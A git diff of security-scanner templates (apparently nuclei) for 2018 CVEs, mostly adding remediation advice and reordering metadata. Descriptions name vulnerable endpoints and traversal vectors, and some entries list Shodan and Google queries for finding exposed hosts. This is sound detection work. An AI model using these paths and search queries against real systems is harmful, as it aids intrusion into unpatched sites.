issue will be fixed by updating to the latest version of Gogs. reference: - https://www.anquanke.com/post/id/163575 - https://github.com/vulhub/vulhub/tree/master/gogs/CVE-2018-18925 - https://nvd.nist.gov/vuln/detail/cve-2018-18925 - https://github.com/gogs/gogs/issues/5469 - remediation: This issue will be fixed by updating to the latest version of Gogs. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-18925 cwe-id: CWE-384 epss-score: 0.13227 - cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* epss-percentile: 0.94833 + cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: gogs diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index 481d106409..1ad9c457c0 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 is vulnerable to reflected cross-site scripting via assets/edit/registrar-account.php. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/45883/ - https://github.com/domainmod/domainmod/issues/79 @@ -16,11 +18,11 @@ info: cve-id: CVE-2018-19136 cwe-id: CWE-79 epss-score: 0.00247 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* epss-percentile: 0.61938 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: domainmod product: domainmod tags: edb,cve,cve2018,domainmod,xss,authenticated diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index 16b75b6070..444d0d5ac8 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 is vulnerable to reflected cross-site Scripting via assets/edit/ip-address.php. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://github.com/domainmod/domainmod/issues/79 - https://nvd.nist.gov/vuln/detail/CVE-2018-19137 @@ -15,11 +17,11 @@ info: cve-id: CVE-2018-19137 cwe-id: CWE-79 epss-score: 0.0008 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* epss-percentile: 0.33312 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: domainmod product: domainmod tags: cve,cve2018,domainmod,xss,authenticated diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index b037766cbc..a00f827d5f 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Ninja Forms plugin before 3.3.18 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in includes/Admin/Menus/Submissions.php via the begin_date, end_date, or form_id parameters. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to the latest version of the Ninja Forms plugin (3.3.18 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/fb036dc2-0ee8-4a3e-afac-f52050b3f8c7 - https://wordpress.org/plugins/ninja-forms/ @@ -18,14 +20,14 @@ info: cve-id: CVE-2018-19287 cwe-id: CWE-79 epss-score: 0.82305 - cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:* epss-percentile: 0.97953 + cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: ninjaforma product: ninja_forms + framework: wordpress tags: wp-plugin,wp,xss,authenticated,wpscan,edb,cve,cve2018,ninja-forms,wordpress http: diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index a691be7d32..b5596e6a16 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Zyxel VMG1312-B10D 5.13AAXA.8 is susceptible to local file inclusion. A remote unauthenticated attacker can send a specially crafted URL request containing "dot dot" sequences (/../), conduct directory traversal attacks, and view arbitrary files. + remediation: | + Apply the latest firmware update provided by Zyxel to fix the Local File Inclusion vulnerability. reference: - https://www.exploit-db.com/exploits/45904 - https://www.cybersecurity-help.cz/vdb/SB2018120309 @@ -18,14 +20,14 @@ info: cve-id: CVE-2018-19326 cwe-id: CWE-22 epss-score: 0.01394 - cpe: cpe:2.3:o:zyxel:vmg1312-b10d_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.84719 + cpe: cpe:2.3:o:zyxel:vmg1312-b10d_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: http.html:"VMG1312-B10D" + max-request: 1 vendor: zyxel product: vmg1312-b10d_firmware + shodan-query: http.html:"VMG1312-B10D" tags: lfi,modem,router,edb,cve,cve2018,zyxel http: diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 77029f05d6..3bc4c1bd4b 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: critical description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API. + remediation: | + Upgrade to the latest version of Wowza Streaming Engine Manager or apply the necessary patches to fix the directory traversal vulnerability. reference: - https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html - https://nvd.nist.gov/vuln/detail/CVE-2018-19365 @@ -15,8 +17,8 @@ info: cve-id: CVE-2018-19365 cwe-id: CWE-22 epss-score: 0.01616 - cpe: cpe:2.3:a:wowza:streaming_engine:4.7.4.0.1:*:*:*:*:*:*:* epss-percentile: 0.85867 + cpe: cpe:2.3:a:wowza:streaming_engine:4.7.4.0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wowza diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index a4ed2c013c..c8cf32bdcc 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI. + remediation: | + Apply the latest patch or upgrade to a non-vulnerable version of SolarWinds Database Performance Analyzer. reference: - https://i.imgur.com/Y7t2AD6.png - https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5 @@ -15,8 +17,8 @@ info: cve-id: CVE-2018-19386 cwe-id: CWE-79 epss-score: 0.00205 - cpe: cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:* epss-percentile: 0.57738 + cpe: cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:* metadata: max-request: 1 vendor: solarwinds diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml index 47dad8fe4e..0b22244cc8 100644 --- a/http/cves/2018/CVE-2018-19439.yaml +++ b/http/cves/2018/CVE-2018-19439.yaml @@ -5,19 +5,19 @@ info: author: madrobot,dwisiswant0 severity: medium description: Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter. + remediation: Fixed in later versions including 5.4. reference: - http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2018-19439 - http://seclists.org/fulldisclosure/2018/Nov/58 - remediation: Fixed in later versions including 5.4. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-19439 cwe-id: CWE-79 epss-score: 0.01135 - cpe: cpe:2.3:a:oracle:secure_global_desktop:4.4:*:*:*:*:*:*:* epss-percentile: 0.82901 + cpe: cpe:2.3:a:oracle:secure_global_desktop:4.4:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2018/CVE-2018-19458.yaml b/http/cves/2018/CVE-2018-19458.yaml index 96de053589..5740248ca0 100644 --- a/http/cves/2018/CVE-2018-19458.yaml +++ b/http/cves/2018/CVE-2018-19458.yaml @@ -6,6 +6,8 @@ info: severity: high description: | PHP Proxy 3.0.3 is susceptible to local file inclusion vulnerabilities that allow unauthenticated users to read files from the server via index.php?q=file:/// (a different vulnerability than CVE-2018-19246). + remediation: | + Upgrade PHP Proxy to a version that is not affected by the vulnerability (3.0.4 or later) or apply the necessary patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/45780 - https://pentest.com.tr/exploits/PHP-Proxy-3-0-3-Local-File-Inclusion.html @@ -17,8 +19,8 @@ info: cve-id: CVE-2018-19458 cwe-id: CWE-287 epss-score: 0.10992 - cpe: cpe:2.3:a:php-proxy:php-proxy:3.0.3:*:*:*:*:*:*:* epss-percentile: 0.9438 + cpe: cpe:2.3:a:php-proxy:php-proxy:3.0.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: php-proxy diff --git a/http/cves/2018/CVE-2018-19749.yaml b/http/cves/2018/CVE-2018-19749.yaml index 46f662e2b5..2e976b03d9 100644 --- a/http/cves/2018/CVE-2018-19749.yaml +++ b/http/cves/2018/CVE-2018-19749.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/account-owner.php Owner name field. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://github.com/domainmod/domainmod/issues/81 - https://www.exploit-db.com/exploits/45941/ @@ -16,11 +18,11 @@ info: cve-id: CVE-2018-19749 cwe-id: CWE-79 epss-score: 0.00156 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* epss-percentile: 0.51378 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: domainmod product: domainmod tags: cve,cve2018,domainmod,xss,authenticated,edb diff --git a/http/cves/2018/CVE-2018-19751.yaml b/http/cves/2018/CVE-2018-19751.yaml index 003fc667d2..660a41d241 100644 --- a/http/cves/2018/CVE-2018-19751.yaml +++ b/http/cves/2018/CVE-2018-19751.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /admin/ssl-fields/add.php Display Name, Description & Notes field parameters. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/45947/ - https://github.com/domainmod/domainmod/issues/83 @@ -16,11 +18,11 @@ info: cve-id: CVE-2018-19751 cwe-id: CWE-79 epss-score: 0.00156 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* epss-percentile: 0.51378 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: domainmod product: domainmod tags: cve,cve2018,domainmod,xss,authenticated,edb diff --git a/http/cves/2018/CVE-2018-19752.yaml b/http/cves/2018/CVE-2018-19752.yaml index 3602e63bc4..23683ce194 100644 --- a/http/cves/2018/CVE-2018-19752.yaml +++ b/http/cves/2018/CVE-2018-19752.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://github.com/domainmod/domainmod/issues/84 - https://www.exploit-db.com/exploits/45949/ @@ -16,11 +18,11 @@ info: cve-id: CVE-2018-19752 cwe-id: CWE-79 epss-score: 0.00156 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* epss-percentile: 0.51378 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: domainmod product: domainmod tags: cve,cve2018,domainmod,xss,authenticated,edb diff --git a/http/cves/2018/CVE-2018-19753.yaml b/http/cves/2018/CVE-2018-19753.yaml index 2c7dd006e7..d2613321b6 100644 --- a/http/cves/2018/CVE-2018-19753.yaml +++ b/http/cves/2018/CVE-2018-19753.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Tarantella Enterprise versions prior to 3.11 are susceptible to local file inclusion. + remediation: | + Upgrade Tarantella Enterprise to version 3.11 or higher to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2018-19753 @@ -17,8 +19,8 @@ info: cve-id: CVE-2018-19753 cwe-id: CWE-22 epss-score: 0.01061 - cpe: cpe:2.3:a:oracle:tarantella_enterprise:*:*:*:*:*:*:*:* epss-percentile: 0.82317 + cpe: cpe:2.3:a:oracle:tarantella_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2018/CVE-2018-19877.yaml b/http/cves/2018/CVE-2018-19877.yaml index 343dac18b6..1288f9a019 100644 --- a/http/cves/2018/CVE-2018-19877.yaml +++ b/http/cves/2018/CVE-2018-19877.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file. + remediation: | + Upgrade Adiscon LogAnalyzer to version 4.1.7 or later to mitigate this vulnerability. reference: - https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/ - https://www.exploit-db.com/exploits/45958/ @@ -16,11 +18,11 @@ info: cve-id: CVE-2018-19877 cwe-id: CWE-79 epss-score: 0.00268 - cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* epss-percentile: 0.63562 + cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: adiscon product: loganalyzer tags: adiscon,xss,edb,cve,cve2018 diff --git a/http/cves/2018/CVE-2018-19892.yaml b/http/cves/2018/CVE-2018-19892.yaml index 700f972790..2a0220487a 100644 --- a/http/cves/2018/CVE-2018-19892.yaml +++ b/http/cves/2018/CVE-2018-19892.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/45959 - https://github.com/domainmod/domainmod/issues/85 @@ -16,11 +18,11 @@ info: cve-id: CVE-2018-19892 cwe-id: CWE-79 epss-score: 0.00101 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* epss-percentile: 0.40768 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: domainmod product: domainmod tags: cve2018,domainmod,xss,authenticated,edb,cve diff --git a/http/cves/2018/CVE-2018-19914.yaml b/http/cves/2018/CVE-2018-19914.yaml index 7141536c04..0a2ea63978 100644 --- a/http/cves/2018/CVE-2018-19914.yaml +++ b/http/cves/2018/CVE-2018-19914.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/dns.php Profile Name or notes field. + remediation: | + Upgrade to the latest version of DomainMOD or apply the necessary patches to fix the XSS vulnerability. reference: - https://www.exploit-db.com/exploits/46375/ - https://github.com/domainmod/domainmod/issues/87 @@ -16,11 +18,11 @@ info: cve-id: CVE-2018-19914 cwe-id: CWE-79 epss-score: 0.0025 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* epss-percentile: 0.6216 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: domainmod product: domainmod tags: cve2018,domainmod,xss,authenticated,edb,cve diff --git a/http/cves/2018/CVE-2018-19915.yaml b/http/cves/2018/CVE-2018-19915.yaml index 224db35096..23c58dc254 100644 --- a/http/cves/2018/CVE-2018-19915.yaml +++ b/http/cves/2018/CVE-2018-19915.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the assets/edit/host.php Web Host Name or Web Host URL field. + remediation: | + Upgrade to the latest version of DomainMOD (>=4.11.02) to mitigate this vulnerability. reference: - https://github.com/domainmod/domainmod/issues/87 - https://www.exploit-db.com/exploits/46376/ @@ -16,11 +18,11 @@ info: cve-id: CVE-2018-19915 cwe-id: CWE-79 epss-score: 0.00185 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* epss-percentile: 0.55039 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: domainmod product: domainmod tags: domainmod,xss,authenticated,edb,cve,cve2018 diff --git a/http/cves/2018/CVE-2018-20009.yaml b/http/cves/2018/CVE-2018-20009.yaml index 1b08bab775..d4f809c7e3 100644 --- a/http/cves/2018/CVE-2018-20009.yaml +++ b/http/cves/2018/CVE-2018-20009.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider.php ssl-provider-name and ssl-provider's-url parameters. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://github.com/domainmod/domainmod/issues/88 - https://www.exploit-db.com/exploits/46372/ @@ -16,11 +18,11 @@ info: cve-id: CVE-2018-20009 cwe-id: CWE-79 epss-score: 0.0025 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* epss-percentile: 0.6216 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: domainmod product: domainmod tags: domainmod,xss,authenticated,edb,cve,cve2018 diff --git a/http/cves/2018/CVE-2018-20010.yaml b/http/cves/2018/CVE-2018-20010.yaml index 955687a22e..3e6c0186dc 100644 --- a/http/cves/2018/CVE-2018-20010.yaml +++ b/http/cves/2018/CVE-2018-20010.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider-account.php Username field. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/46373/ - https://github.com/domainmod/domainmod/issues/88 @@ -16,11 +18,11 @@ info: cve-id: CVE-2018-20010 cwe-id: CWE-79 epss-score: 0.0025 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* epss-percentile: 0.6216 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: domainmod product: domainmod tags: domainmod,xss,authenticated,edb,cve,cve2018 diff --git a/http/cves/2018/CVE-2018-20011.yaml b/http/cves/2018/CVE-2018-20011.yaml index b33446edf1..96fc7edf6a 100644 --- a/http/cves/2018/CVE-2018-20011.yaml +++ b/http/cves/2018/CVE-2018-20011.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/category.php CatagoryName and StakeHolder parameters. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/46374/ - https://github.com/domainmod/domainmod/issues/88 @@ -16,11 +18,11 @@ info: cve-id: CVE-2018-20011 cwe-id: CWE-79 epss-score: 0.0025 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* epss-percentile: 0.6216 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: domainmod product: domainmod tags: domainmod,xss,authenticated,edb,cve,cve1028 diff --git a/http/cves/2018/CVE-2018-20462.yaml b/http/cves/2018/CVE-2018-20462.yaml index b891e9d4f5..3553bcee82 100644 --- a/http/cves/2018/CVE-2018-20462.yaml +++ b/http/cves/2018/CVE-2018-20462.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress JSmol2WP version 1.07 and earlier is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter. + remediation: | + Update to the latest version of the WordPress JSmol2WP plugin (1.08 or higher) to mitigate this vulnerability. reference: - https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt - https://wpvulndb.com/vulnerabilities/9196 @@ -16,13 +18,13 @@ info: cve-id: CVE-2018-20462 cwe-id: CWE-79 epss-score: 0.00245 - cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* epss-percentile: 0.61735 + cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: jsmol2wp_project product: jsmol2wp + framework: wordpress tags: cve,cve2018,wordpress,xss,wp-plugin http: diff --git a/http/cves/2018/CVE-2018-20463.yaml b/http/cves/2018/CVE-2018-20463.yaml index e9f990df95..c8cb6a933e 100644 --- a/http/cves/2018/CVE-2018-20463.yaml +++ b/http/cves/2018/CVE-2018-20463.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress JSmol2WP plugin 1.07 is susceptible to local file inclusion via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This can also be exploited for server-side request forgery. + remediation: | + Update to the latest version of the JSmol2WP plugin (>=1.08) or remove the plugin if it is not necessary. reference: - https://wpscan.com/vulnerability/9197 - https://wordpress.org/plugins/jsmol2wp/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2018-20463 cwe-id: CWE-22 epss-score: 0.02026 - cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* epss-percentile: 0.87475 + cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: jsmol2wp_project product: jsmol2wp + framework: wordpress tags: wp,wp-plugin,wordpress,jsmol2wp,wpscan,cve,cve2018,traversal http: diff --git a/http/cves/2018/CVE-2018-20470.yaml b/http/cves/2018/CVE-2018-20470.yaml index 53e4fdff97..4b7b77f79f 100644 --- a/http/cves/2018/CVE-2018-20470.yaml +++ b/http/cves/2018/CVE-2018-20470.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files. + remediation: | + Apply the latest security patches or upgrade to a patched version of Tyto Sahi pro. reference: - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ - http://packetstormsecurity.com/files/153330/Sahi-Pro-7.x-8.x-Directory-Traversal.html @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-20470 cwe-id: CWE-22 epss-score: 0.61765 - cpe: cpe:2.3:a:sahipro:sahi_pro:*:*:*:*:*:*:*:* epss-percentile: 0.97374 + cpe: cpe:2.3:a:sahipro:sahi_pro:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sahipro diff --git a/http/cves/2018/CVE-2018-20526.yaml b/http/cves/2018/CVE-2018-20526.yaml index c13f35b53d..5f4fcf7284 100644 --- a/http/cves/2018/CVE-2018-20526.yaml +++ b/http/cves/2018/CVE-2018-20526.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Roxy Fileman 1.4.5 is susceptible to unrestricted file upload via upload.php. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Upgrade to a patched version of Roxy Fileman or apply the necessary security patches to prevent unrestricted file uploads. reference: - http://packetstormsecurity.com/files/151033/Roxy-Fileman-1.4.5-File-Upload-Directory-Traversal.html - https://www.exploit-db.com/exploits/46085/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2018-20526 cwe-id: CWE-434 epss-score: 0.00794 - cpe: cpe:2.3:a:roxyfileman:roxy_fileman:1.4.5:*:*:*:*:*:*:* epss-percentile: 0.7941 + cpe: cpe:2.3:a:roxyfileman:roxy_fileman:1.4.5:*:*:*:*:*:*:* metadata: - max-request: 2 - google-query: intitle:"Roxy file manager" verified: true + max-request: 2 vendor: roxyfileman product: roxy_fileman + google-query: intitle:"Roxy file manager" tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb http: diff --git a/http/cves/2018/CVE-2018-20608.yaml b/http/cves/2018/CVE-2018-20608.yaml index e03c8b0dd5..2b37f2e880 100644 --- a/http/cves/2018/CVE-2018-20608.yaml +++ b/http/cves/2018/CVE-2018-20608.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: high description: Imcat 4.4 allows remote attackers to read phpinfo output via the root/tools/adbug/binfo.php?phpinfo1 URI. + remediation: | + Update Imcat to the latest version or apply the necessary patches to fix the Phpinfo Configuration vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-20608 classification: @@ -13,8 +15,8 @@ info: cve-id: CVE-2018-20608 cwe-id: CWE-200 epss-score: 0.03654 - cpe: cpe:2.3:a:txjia:imcat:4.4:*:*:*:*:*:*:* epss-percentile: 0.90503 + cpe: cpe:2.3:a:txjia:imcat:4.4:*:*:*:*:*:*:* metadata: max-request: 1 vendor: txjia diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml index 2f4bc40f9f..112dfd0b74 100644 --- a/http/cves/2018/CVE-2018-20824.yaml +++ b/http/cves/2018/CVE-2018-20824.yaml @@ -5,6 +5,8 @@ info: author: madrobot,dwisiswant0 severity: medium description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the cyclePeriod parameter. + remediation: | + Upgrade to Atlassian Jira version 7.13.1 or later to mitigate this vulnerability. reference: - https://jira.atlassian.com/browse/JRASERVER-69238 - https://nvd.nist.gov/vuln/detail/CVE-2018-20824 @@ -14,13 +16,13 @@ info: cve-id: CVE-2018-20824 cwe-id: CWE-79 epss-score: 0.00211 - cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* epss-percentile: 0.58311 + cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"Atlassian Jira" vendor: atlassian product: jira + shodan-query: http.component:"Atlassian Jira" tags: cve,cve2018,atlassian,jira,xss http: diff --git a/http/cves/2018/CVE-2018-20985.yaml b/http/cves/2018/CVE-2018-20985.yaml index 257d98c2c6..53df56cad1 100644 --- a/http/cves/2018/CVE-2018-20985.yaml +++ b/http/cves/2018/CVE-2018-20985.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected. + remediation: | + Update to the latest version of WordPress Payeezy Pay plugin. reference: - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/ - https://wordpress.org/plugins/wp-payeezy-pay/#developers @@ -15,13 +17,13 @@ info: cve-id: CVE-2018-20985 cwe-id: CWE-20 epss-score: 0.01113 - cpe: cpe:2.3:a:payeezy:wp_payeezy_pay:*:*:*:*:*:wordpress:*:* epss-percentile: 0.82735 + cpe: cpe:2.3:a:payeezy:wp_payeezy_pay:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: payeezy product: wp_payeezy_pay + framework: wordpress tags: cve,cve2018,wordpress,lfi,plugin http: diff --git a/http/cves/2018/CVE-2018-2392.yaml b/http/cves/2018/CVE-2018-2392.yaml index 9be966ac35..25239d8627 100644 --- a/http/cves/2018/CVE-2018-2392.yaml +++ b/http/cves/2018/CVE-2018-2392.yaml @@ -6,6 +6,8 @@ info: severity: high description: | SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XML external entity injection (XXE) vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart. + remediation: | + Apply the latest security patches and updates provided by SAP to mitigate this vulnerability. Additionally, ensure that the SAP Internet Graphics Server (IGS) is not exposed to untrusted networks or the internet. reference: - 